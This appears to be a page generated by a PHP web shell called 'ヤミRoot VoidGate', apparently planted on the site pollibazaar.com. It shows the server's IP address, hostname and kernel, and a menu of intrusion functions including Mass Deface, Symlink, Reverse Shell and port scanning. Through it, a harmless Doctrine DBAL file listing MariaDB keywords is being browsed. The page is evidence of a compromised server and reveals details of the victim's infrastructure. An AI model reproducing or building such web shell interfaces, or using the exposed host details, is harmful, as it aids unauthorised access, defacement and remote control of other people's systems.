ヤミRoot VoidGate
User / IP
:
216.73.217.162
Host / Server
:
15.235.182.215 / pollibazaar.com
System
:
Linux asia.cbnex.com 5.14.0-611.49.2.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 30 09:05:08 EDT 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
pollibazaar
/
public_html
/
vendor
/
doctrine
/
dbal
/
src
/
Platforms
/
Keywords
/
Viewing: MariaDb117Keywords.php
<?php declare(strict_types=1); namespace Doctrine\DBAL\Platforms\Keywords; use Doctrine\Deprecations\Deprecation; use function array_merge; /** * MariaDB 11.7 reserved keywords list. */ class MariaDb117Keywords extends MariaDb102Keywords { /** * {@inheritDoc} * * @deprecated */ public function getName(): string { Deprecation::triggerIfCalledFromOutside( 'doctrine/dbal', 'https://github.com/doctrine/dbal/pull/5433', 'MariaDb117Keywords::getName() is deprecated.', ); return 'MariaDb117'; } /** * {@inheritDoc} * * @link https://mariadb.com/docs/server/reference/sql-structure/sql-language-structure/reserved-words */ protected function getKeywords(): array { $keywords = parent::getKeywords(); // New Keywords and Reserved Words $keywords = array_merge($keywords, ['VECTOR']); return $keywords; } }
Coded With 💗 by
0x6ick